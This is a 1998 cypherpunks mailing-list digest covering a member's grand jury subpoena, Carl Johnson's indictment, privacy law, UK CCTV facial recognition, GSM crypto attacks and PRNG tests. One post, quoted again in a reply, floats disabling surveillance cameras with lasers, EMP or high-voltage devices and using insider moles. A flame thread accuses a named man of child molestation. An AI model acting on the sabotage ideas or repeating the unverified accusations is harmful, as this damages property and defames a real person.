       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 09:47:33 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: desperate.... (fwd)
Message-ID: <199810210135.UAA00638@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 20 Oct 1998 18:53:54 -0500
> From: shadow <shadow@tfs.net>
> Subject: Re: desperate....

> 
> >Could you give any info about wireless transmission especifically
> >satellite transmission.
> 
> >Thank you and I desperately need your help.
> 
> Well lets see, what kind of government budget are you working with or
> are just indepentantly wealthy?
> 
> It takes lots o' money to get setup in satellite transmission unless you
> just want to receive the info then that is as cheap as getting a used
> dish and the equipment to go with it. If you plan to transmit, then the
> good ol' boys of the FCC will want your money for a license. Then there
> are zoning laws to check into, construction permits, concret to pour,
> power for it, and oh a wife that will put up with it in the yard.

Wow, and all I have to do is setup my DirectPC dish and pay about $150/mo.
for 400K (max) down-link bandwidth, though I do need some mechanism to
transmit my data out, a regular modem works with the standard software.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 10:25:52 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: SSZ - IRS update (fwd)
Message-ID: <199810210216.VAA01037@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 20 Oct 1998 21:26:29 -0400
> From: John Young <jya@pipeline.com>
> Subject: Re: SSZ - IRS update

> Okay, thanks for the update. Any chance that affidavit can 
> be shared? Or is there a sword over your head?
> 
> Not meaning to get in your affairs, just hoping for information.

Once I know that my part in the matter is concluded I'll scan and make
available the subpeona, the affadavit, & the RCMP photo of Toto that I was
asked to identify, but not to share around at this time. That won't occur
until I've either been released from the Grand Jury or appeared before them.
I will continue to make updates as events unfold provided they don't
conflict with any actions (or non-actions) that I've agreed to comply with.

> Can you tell more about the lack of support from Austin cpunks,
> any change, or are you left to fend for yourself?

Um, I would have to say that other than the one person who helped me obtain
a lawyer to review my subpeona and affadavit, another person apologized for
their oversight, I've basicaly received zero support. I've decided that
since the group is so apathetic about the entire set of issues relating to
cryptography, civil liberties, & economics I won't be hosting the webpage or
mailing list after Nov. 1, 1998. This bums me out more than I know how to
express, something like 4+ years worth of effort shot to shit. It has such
potential but will remain unfulfilled so long as members find the O'Henry
Pun-Off more important. This in no way will alter my continued support of the
CDR node I host. There has not been a single piece of discussion on the
Austin Cpunks mailing list itself other than my announcement that I was
ceasing support and 1 persons responce that they had no objections.

> Sorry to say the obvious, but watch your back. No not Adam,
> he's certifiably cuckoo, it's the reasonable people that scare me.
                                   ^
                                   supposedly

:)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Oct 1998 09:50:42 +0800
To: cypherpunks@toad.com
Subject: CJustice
Message-ID: <199810210125.VAA19427@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



We got documents on CJ from the US District Court,Western 
WA, in Tacoma. Pretty skimpy but informative on why CJ has 
been held for two months since his arrest on August 18.

As noted earlier, CJ has been indicted, clubbed with a blunt 
instrument:

                          COUNT 1

  Beginning on or about June 23, 1997, and continuing through
  December 9, 1997, at Tacoma and elsewhere, within the Western
  District of Washington, CARL EDWARD JOHNSON, did threaten
  to kill certain federal law enforcement officers and judges
  of the United States, with intent to impeded, intimidate, or
  interfere with said officers and judges on account of their
  official duties.

  All in violation of Title 18, United States Code, Sections
  115(a)(1)(B).

  Dated September 30 1998.

The June 23 and December dates bracket the messages cited in
the complaint by Jeff Gordon, and discussed here. The grand
jury must have base its charge on Jeff's complaint for there's
no explication of the charges in the indictment. (See the complaint
at: http://jya.com/cejfiles.htm.)

On the date of the indictment a bench warrant was issued for 
CJ's arrest. It was returned on October 9 marked "returned 
unexcuted - warrant issued in error - per AUSA Robb 
London." CJ was in Springfield during this time.

There were two handwritten notes. 

One says: "Called Tucson - Have Mag case on 98-2824M. Undergoing 
psych eval. 8/26/98. 520-620-7200.

The other: "10/5/98. Per Tucson, Deft in Psych Eval. Unsure of
dates in order to figure Speedy Trail."

A Case Status form, dated September 22, 1998, notes that CJ is
in detention based on a District of Arizona order, with the
note, "8-18-98; now awaiting compentency evaluation and R40
hearing." At the bottom the form states "The estimated trial 
time is 4 trial days."

What's screwy about all this is that when the grand jury 
returned the indictment and a bench warrant was issued, CJ was 
in Springfield but the AUSA seemed not to know it, or didn't 
tell the magistrate who issued the bench warrant, although the 
notes in the case file clearly showed that this information had 
been recorded. Who knows what else the grand jury and judge was
told or not told by the US Attorneys and the IRS -- the public 
record tells naught.

And CJ's right to a speedy trial, though noted, is overridden 
by the prolonged psychological evaluation process, as well as
overlooked or ignored communications between WA and AZ.

And the buffoonish bench warrant? That appears to indicate 
incompetence in the US Attorney's office -- that's AUSA
Robb London in charge (not to slight Katrina Pflaumer, USA, 
and William Redkey, AUSA, who also signed the indictment).

And the four days for a trial for alleged murder attempts? Is 
this real? Or is this threat of quick vicious justice by biased 
attorneys with vengence in mind, coupled with the prolonged 
delay, a ploy to coerce CJ to plead?

Brings back memories of Jim Bell's punishment by delay, 
isolation, manipulation, change of jails, and coercion, with 
a plea bargain just to get the the psychological torture to 
stop.

Wonder if Jim and CJ are allowed to swap tips and tricks on 
surviving political imprisonment in the United States of 
America. Creative writing of text and music, lyrics for the
song of assassination politics by American Justice.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Oct 1998 09:50:37 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: SSZ - IRS update
In-Reply-To: <199810210013.TAA00301@einstein.ssz.com>
Message-ID: <199810210134.VAA10088@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Okay, thanks for the update. Any chance that affidavit can 
be shared? Or is there a sword over your head?

Not meaning to get in your affairs, just hoping for information.

Can you tell more about the lack of support from Austin cpunks,
any change, or are you left to fend for yourself?

Sorry to say the obvious, but watch your back. No not Adam,
he's certifiably cuckoo, it's the reasonable people that scare me.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 11:59:49 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: APM: A Meeting (fwd)
Message-ID: <199810210350.WAA01610@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 20 Oct 1998 21:55:55 -0500
> From: "Mark P. Fister" <fister@inetport.com>
> Subject: Re: APM: A Meeting

> So here goes:
> 
> A) Wayne, in order to constantly let everyone know how many are subscribed,
>    could you start an 'Administrivia' mailing which prefaces the subject line
>    with the number of people currently subscribed?  This is what Russ Cooper
>    does with the NTBugTraq mailing list. :)

Wayne doesn't set policy for SSZ. I must admit I'm at a loss as to why this
particular piece of info is the least bit interesting. While I have no
objections in principle somebody else will have to do the programming and
demonstrate it will work *before* it goes into place on SSZ. Wayne does have
permission to experiment on SSZ machines. The code must be stable *and*
fail-safe. Before it goes in it will be required to demonstrate various
failure modes.

>    flexible scripting engine accessing mongo data and displaying hip graphics
>    to the user through their favorite browser."  Check it out - you won't be
>    sorry.

Till you see the bill for supporting all those hip (sic) graphics and have
to spend the time responding to all the bitches about how long it takes for
end-users to get those pages to their machines.

I'd like to offer another operating paradigm for the list, leave all the
marketing bullshit elsewhere.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 21 Oct 1998 07:02:32 +0800
To: cypherpunks@cyberpass.net
Subject: lotus notes secure mail, help configuring
Message-ID: <199810202204.XAA14836@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anyone conversant with configuring and using lotus notes and domino
mail server for email encryption?

I could use someone familiar with it to pick their brains on the
topic.

The purpose of this exercise is to find out the keys used in the lotus
notes export versions "international crypto" implementation
("differential key escrow" or whatever it's called -- the 40 bits
unescrowed, and 24 bits escrowed design).

First step is to get it to encrypt something.  I have a domino mail
server running, and the notes mail client, but am having difficulty
getting it to send encrypted mail.

Please email me.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 21 Oct 1998 07:07:12 +0800
To: cypherpunks@toad.com
Subject: Re: Happy Birthday to Convicted Child Molester Gary Burnore
In-Reply-To: <199810140550.HAA15476@replay.com>
Message-ID: <199810202216.AAA31152@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



gburnore@databasix.com (Gary L. Burnore) wrote:

> >Just because you're pissed that someone anonymously blew the whistle
> >on your pederasty in Santa Clara, CA by informing your victim's
> >mother and school officials is no reason for such ad hominem.
> 
> Hi ronnie.  Too bad you're still just making stuff up.  The above never
> happened.

So which was the lie?  This recent post of yours, or the previous
one where you claimed:

-> So now the cowards in Ronald Francis's corner (I'm outright expecting the
-> culprit to be ronald francis himself) have taken to sending email to
-> those who have names listed on databasix's web page.  Sending comments to
-> a 17 year old that they're going to tell her mother that she's having an
-> affair with me.  Telling her mother that I'm molesting her daughter.
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-> Having all sorts of fun.

If it didn't happen, why did you claim it did?  You are the one who
resorted to a PUBLIC post to whine about a PRIVATE e-mail not even
addressed to you.  And what's this about a DataBasix web page?  Were
you maintaining a kiddie porn site on all of your victims to trade
with fellow pedophiles?

Your own wording "Telling her mother that I'm molesting her
daughter" pretty much sums up the whistleblowing that occurred.  Why
else didn't the girl or her mother complain, instead of you?

> >You
> >were busted fair and square, and your own guilty plea sealed your
> >fate.
> 
> I didn't plead guilty, liar.  

No contest?  Insanity?

> >BTW, did you ever ask yourself how this "RFG" character would
> >have known that you were screwing your live-in girlfriend's daughter
> >behind her back, if he's "the one and only anonymous asshole"?
> 
> I wasn't screwing anyone.  I also wasn't living with anyone.  More lies on
> your part.  You never will get the facts straight.

Not even the $30K in legal fees you spent could refute those facts
upon which you were convicted.  It's a little too late to pretend
you were innocent.  Or are you going to fall back on Camille Klein's
pitiful tale of how your victim allegedly tried to "rape" you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 21 Oct 1998 07:01:57 +0800
To: cypherpunks@toad.com
Subject: Re: Happy Birthday to Convicted Child Molester Gary Burnore
In-Reply-To: <199810140550.HAA15476@replay.com>
Message-ID: <199810202220.AAA31586@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



gburnore@databasix.com (Gary L. Burnore) wrote:

> >fees and PLED GUILTY,
>
> Ronald Guimlette, please correct your lies.  I didn't plead guilty.

If you're going to smear him you should at least learn to spell
"Guilmette".  So what was your plea?  No contest?

> >Real comforting to the folks with kids living on Bland Road and the
> >immediate vicinity...
> 
> More lies Ronald.  Can't see to well from CA, eh?

How can an opinion be a "lie"?  Sarcasm is lost on perverts like
you, I guess.  If you're saying that your neighbors welcome convicted
sex offenders in their neighborhood, then you and they deserve each
other.

> >> There are a few
> >> that post here that really don't like him, though, and it seems they
> >> will do most anything to keep this thread alive.
> >
> >What?  Someone doesn't like child molesters?  Imagine that!
> 
> There are no child molesters posting here.  You're lying again.

That was a self-contradictory statement, since you, a convicted
child molester, just posted.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 21 Oct 1998 07:14:21 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199810202235.AAA00469@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:41 AM 10/20/98 -0500, Bauer, Michael (C)(STP) wrote:
>Anyone got any crypanalytical dirt on PC-Anywhere?  Is its cryptosystem any
>good, or are they doing something stupid like XOR?
>

Hey, fuck you.

-The Vernam Cipher Society-








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Wed, 21 Oct 1998 01:15:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: My (Vince's) citizenship renunciation made difficult
In-Reply-To: <000701bdfbec$a511c220$588195cf@blanc>
Message-ID: <362D65B1.51F36124@workmail.com>
MIME-Version: 1.0
Content-Type: text/html




Eric Seggebruch - NYC SE wrote:
Blanc,
        Sometimes the best advice
is to play the game, get what you want and
let well enough alone.  The fact that they may choose to do nothing
does
not mean that bucking the United States of America is a good idea.
Follow the administrative procedures, leave your anger at home and
if
you want to change the way things are, work to be a good example of
why
libertarian values are morally correct.
 
Last I heard, libertarianism stood for principle (a currency much devalued
these days) and its handmaiden integrity -- not for morality.
Lets leave the moral high ground to those who would use it to coerce
others.
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Wed, 21 Oct 1998 08:26:25 +0800
To: cypherpunks@toad.com
Subject: Re: Dorkslayers..
In-Reply-To: <01BDFBA8.6C12F0A0@noc.mfn.org>
Message-ID: <362D3196.10F114B0@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



Who the heck are the Dork Slayers? Do they use guns/ swords/
explosives/ other deadly stuff ?? to eliminate Dorks? ;-)
Or maybe they should be called, "The Slayers of Dork Inc."... :-)

Later,
Jan Dobrucki




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Morris <jmorris@intercode.com.au>
Date: Wed, 21 Oct 1998 01:07:56 +0800
To: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Subject: Re: desperate....
In-Reply-To: <Pine.GSO.3.96.981007165128.8021B-100000@mudspring.uplb.edu.ph>
Message-ID: <Pine.LNX.3.96.981021020640.24827B-100000@aurora.intercode.com.au>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 7 Oct 1998, Bernardo B. Terrado wrote:

> Could you give any info about wireless transmission especifically 
> satellite transmission.
>  
> Thank you and I desperately need your help.

Can you be more specific?

- James.
--
James Morris
<jmorris@intercode.com.au>          





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 21 Oct 1998 19:54:42 +0800
To: cypherpunks@toad.com
Subject: Status of GSM Crypto Attacks
Message-ID: <199810211113.HAA20775@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forward from anonymous:

Wed, 21 Oct 98

An engineer at a US wireless telecom and a contributor to 
Cryptologia--has asked me to look into the present status 
of attacks on the GSM encryption schemes:  comp128 (a3a8 
authentication, etc.) and, more importantly, the A5.1 and 
A5.2  voice/data encryption algorithms.

After searching the web, I see that you have similar 
interests in this matter.  I've already sent off inquiries 
to some of the researchers in this area--Ross Anderson, 
Simon Shepherd and the two Berkeley students (Goldberg and 
Wagner).  So far, I've only heard back from Wagner.  Do you 
have anything interesting to say about this matter--has 
anything happened since the Spring?  Has a consensus been 
reached on some of the issues discussed in the 
<http://jya.com/crack-a5.htm> document?

I'm trying to get a handle on the present state-of-the art:  
Where do things presently stand--who is doing the work and 
what, if anything, has been verified/demonstrated?   Has A5 
been cracked?   What can be said about the possibility of 
intercepting and decoding an on-air conversation?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 20:48:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810211231.HAA02648@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
> Date: Wed, 21 Oct 1998 10:12:37 +0200
> Subject: Re: "We have to destroy privacy in order to protect privacy"

> What is privacy?

The ability to store or archive material without worry of it being
distributed without prior permission.

The right to tell somebody you won't answer their question or include them
in the dicussion, to the extend of asking them to go someplace else so they
can't overhear or grab the dialogue.

Ultimately it's a societal behavior that is exemplified by citizens not
obtaining material that is relevant or related to you without involving you
from the beginning.

> Although this is a matter of law, only political 
> strategies are executed.

Law == Politics

> Protection of privacy turns out to be the most important 
> human rights issue in this information technology age.

Um, actualy Writ of Habeas Corpus is the most important right. Privacy and
everything else are moot if your sitting in a jail cell with no hope of
release or trial.

> Following several articles in American newspapers, 
> privacy at the work place is in great danger. 

There isn't any privacy at the workspace. When you hire on to an employer
*AND* agree to work on their premises you voluntarily give this up. It is
the same situation as if you hire a kiddy-watcher and you video-tape the
activity for your protection. If you really want privacy protection in the
workplace then insist that detailed limits are included in any contract
(pretty much unheard of).


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 21:40:13 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: UK police chase crooks on CCTV (fwd)
Message-ID: <199810211322.IAA03036@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 21 Oct 1998 14:21:04 +0200
> From: Tim Griffiths <griffith@wis.weizmann.ac.il>
> Subject: UK police chase crooks on CCTV

> Civil liberties groups said they were alarmed by the new system, but
> police defended its use.
> 
> ``The only people entered on to the system will be convicted criminals
> who, through our intelligence, we believe are habitually committing
> crimes in the area,'' The Daily Mail quoted police Chief Superintendent
> Dave Armond as saying. ``If people are not committing crime they have
> nothing to fear, but if they are among the small minority who are, the
> message is, 'We are watching out for you.'''
> 
> The newspaper reported that police initially will use the system to
> concentrate on catching robbery suspects. In the future, however, it

Excuse me....

Since when does 'suspected of' equate to 'convicted criminal'?

Also, in order to wath you (sic) they have to watch everyone - in effect
guilty until proven innocent by the computer software.

What sort of civil recovery are provided for the inevitable software errors?
I bet nadda, and that's wrong too.

This is Big Brother Spin Doctor BULLSHIT.

We need a law or court ruling pretty quickly in the US that sets the
standard that a group of people have no more or less rights than an
individual. This will required LEA's to provide probable cause prior to any
actions against groups of people (such as this).

If they can't audio tape me, or seize my papers and correspondences without
a warrant then they bloody well can't video me without a warrant either
,within the context of criminal proceedings.

Does anyone know if *any* PAC/SIG/whatever has this as their main political
agenda?

 -------------------------------------------------------------------------

On a similar note, here in Austin they are finishing up with putting
hundreds of cameras around town. It isn't long before these sorts of social
theory X'ers get their teeth in the shank of American society.

We've got(!) to put a stop to this sort of stuff. The law should basicaly ok
the use of cameras for vehicular traffic control (this does NOT include
execution of speeding infractions and such), this means no police or other
LEA's may be involved or view the tapes *without* a warrant. The operators
and support personnel should be required to abide by a strict non-disclosure
agreement as well. If they notice a wreck or whatever they should notify the
relevant emergency personel and *IF* the police serve a warrent only then
turn over the tape.

This is a perfect example of why I, personaly, believe that a polycratic
democracy is the only workable kind in the real world.

The 'seperate but equal' doctrine should effect every aspect of a democratic
society.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 21 Oct 1998 21:44:35 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Women cannot commit rape? (fwd)
Message-ID: <199810211325.IAA03084@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 21 Oct 1998 14:19:57 +0200
> From: Tim Griffiths <griffith@wis.weizmann.ac.il>
> Subject: Women cannot commit rape?

> French Supreme Court rules that women cannot commit rape

> "The material element of the crime of rape is only realized if the
> perpetrator
> commits the act of sexual penetration on the person of the victim," it
> said in
> its judgment.

Can a man get a STD from a women? Do men not have the same civil liberties
and concepts of personal privacy that women do? Are we now faced with the
ultimate in sex discrimination - having two sets of laws that are specific
to sex?

Rape is about an invasion of personal physical privacy.

More big brother spin doctor bullshit.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Wed, 21 Oct 1998 22:03:49 +0800
To: griffith@wis.weizmann.ac.il>
Subject: RE: UK police chase crooks on CCTV
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F8505@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Tim Griffiths[SMTP:griffith@wis.weizmann.ac.il] forwarded (yet
> another) report on the Mandrake facial recognition system, this time
> from  http://search.washingtonpost.com/wp-srv/searches/mainsrch.htm#ap
> 
> 
[...snip...]

> CCTV's developer, Software and Systems International, says 
> the system is accurate enough to discern people hiding 
> behind make-up or eye glasses. And growing a beard won't
> help either, the company says.

[...snip...]

According to SSI at  http://www.ssi-ltd.co.uk/latenews.htm#Law  the
program uses the position of facial features to recognise you.  

> Even if offenders try to disguise their appearance,
>  say S&SI, the system will still identify them, as it is
>  based on recognising facial structure, such as the
>  spacing between the eyes, nose and mouth. It takes 
> into account, and disregards, variations of head 
> orientation, lighting conditions, skin colour, 
> make-up, facial expression, facial hair, spectacles
>  and ageing. 

So presumably can be confused by obscuring the exact postion of features
- such as a dense  moustache that covers the mouth, or the presence or
absence of  a hairstyle that seems to change the shape of the head.  I
shave my head - if I grew back some "big hair", or wore a wig, would the
sytem be able to tell where the top of my skull was?  Maybe a full beard
would change the apparent width of the whole head. Maybe dark glasses
would obscure the exact position of the eyes.

As we all know criminals are too stupid to use strong cryptography
without an export license, there is no way any of them would think of
novel high-tech solutions such as wearing a hat or a scarf.

Just to add some irony, the main  line used to sell this to the British
public is control of football (soccer) "hooligans". Like  child
pornography or the "war on drugs", football  fans are easy target for
repressive measures. No respectable citizen wants to be associated with
the "trouble makers". And of course, football fans are notorious for not
wearing scarves or hats, aren't they :-)

Ken Brown (& not his bosses)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 22 Oct 1998 01:26:55 +0800
To: cypherpunks@cyberpass.net
Subject: RE: UK police chase crooks on CCTV (fwd)
Message-ID: <362E110F.30CA@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



The toys are just getting too easy to deploy. Imaging, compression,
networking, mass storage etc...Fucking engineers, oops!

A few fronts: 

Political - this is the preferable way of dealing with this crap but
also the most disturbing because many of those in power seem to think
snooping is a wonderful idea. Tough to convince them that a little
uncertainty is a *good* thing.

Technical:

Briefcase-sized EMP - fun idea but I don't know how to make it workable.

HV generator on the end of a stick - not too tough.

High power LASER to burn out CCDs - buy anonymously, nice, works from a
safe distance.

What's needed are moles to leak detailed info on systems as they're
planned and installed. Then it would be easy to determine the weak
points. If each camera had to be guarded there would be a *huge* problem
just keeping the systems alive. 

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Wed, 21 Oct 1998 17:01:15 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: "We have to destroy privacy in order to protect privacy"
Message-ID: <WIN937-981021081131-0AC9*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



What is privacy?

Just now the political representatives show the world 
how protection of privacy looks like in the world's 
leading Nation. Victim is the President himself who 
unwillingly has become a benchmark case because of 
his sexual affairs.

Although this is a matter of law, only political 
strategies are executed.

Protection of privacy turns out to be the most important 
human rights issue in this information technology age.

Definition of privacy is difficult. It includes not only 
data protection; it draws a line at the border where a 
society is allowed to get concerned about an individual.

Louis Brandeis, Member of the Supreme Court, said in 1890: 
The right for privacy is the right for an individual to 
live for him/her-self. Protection of privacy includes 
protection of private information, safety, protection 
of communication, and protection of territory (house, 
public space, and work place).

Following several articles in American newspapers, 
privacy at the work place is in great danger. 
Surveillance is very often made part of the contract 
with the employer. A Report by the American Management 
Association says that two thirds of employers are 
controlling emails and other work at the computer, 
and are tapping phone calls. Surveillance cameras 
are used, e.g., to trace movements of employees in 
company buildings; regular tests for drugs, requests 
for intimate information and various psychological 
tests are performed.

Many people in the US may believe this is normal. 
Who tells them that this a violation of privacy 
rights ? The government ? Bill Gates ? Tim May ? 

Tim May wrote:
>To be more concrete, if I compile lists of who is writing articles on
>Usenet, I have no obligation to either purge these records or 
>show them to others or not sell them or _anything_. The 
>government cannot get at myrecords except under limited 
>situations.

If companies are using personal data, which they have 
gathered from open sources, without explicit permission 
for other purposes than in direct business with that 
person, then they are violating data protection rules. 
If the sources are not open, then they are also violating 
fair competition rules which may be considered to be 
criminal in some countries.

Tim May wrote:
>Europe's "data privacy laws," which I have been critical of for 
>more than ten years now, are an abomination. While the laws 
>sound well-intentioned, they effectively give the state the power 
>to sift through filing cabinets and disk drives looking for violations.

Sifting through filing cabinets is also clearly a violation 
of privacy rights. However, does it mean that privacy is 
uncontrollable?  Alternatively, the only protection is 
not to put any personal data on a network. Use your 
pseudonym instead. Strong encryption does not help, 
because the receiver side may not respect your privacy.


Theodor Schlickmann




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 21 Oct 1998 18:01:35 +0800
To: X1 <rsriram@krdl.org.sg>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <362DB7C9.F0DE3296@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



X1 wrote:
> 
> Hi,
> 
> A few questions on Pseudo Random Number Generators...
> 
> 1. Which are the best software PRNG's available today?

Not answerable.  (Reason: substitute car, HIFI, medical doctor, etc. 
for 'software PRNG').

> 
> 2. Are there any software implementations to test the randomness of a
>    PRNG ? I've looked at Diehard - is there anything else?

There are tests that one can implement with reasonable effort.
A test relevant in cryptology is Maurer's test. See Menezes et al.,
Handbook of Applied Cryptography.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph 'Anonymous' Howe" <nobody@privacy.nb.ca>
Date: Wed, 21 Oct 1998 23:29:10 +0800
To: cypherpunks@cyberpass.net
Subject: cypherpunks archives, books
Message-ID: <199810211455.LAA25547@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain




Could someone post the address of the current
cypherpunks archives again? Everything seems
to be missing or out of date.

Also, what's the name of that book... The Crystal Palace?
Maybe I'm confused.

Thanks for the info.

--THE LIE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Oct 1998 02:21:13 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: RE: UK police chase crooks on CCTV (fwd)
In-Reply-To: <362E110F.30CA@lsil.com>
Message-ID: <199810211803.NAA010.65@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <362E110F.30CA@lsil.com>, on 10/21/98 
   at 09:51 AM, Michael Motyka <mmotyka@lsil.com> said:


>The toys are just getting too easy to deploy. Imaging, compression,
>networking, mass storage etc...Fucking engineers, oops!

>A few fronts: 

>Political - this is the preferable way of dealing with this crap but also
>the most disturbing because many of those in power seem to think snooping
>is a wonderful idea. Tough to convince them that a little uncertainty is
>a *good* thing.

>Technical:

>Briefcase-sized EMP - fun idea but I don't know how to make it workable.

>HV generator on the end of a stick - not too tough.

>High power LASER to burn out CCDs - buy anonymously, nice, works from a
>safe distance.

>What's needed are moles to leak detailed info on systems as they're
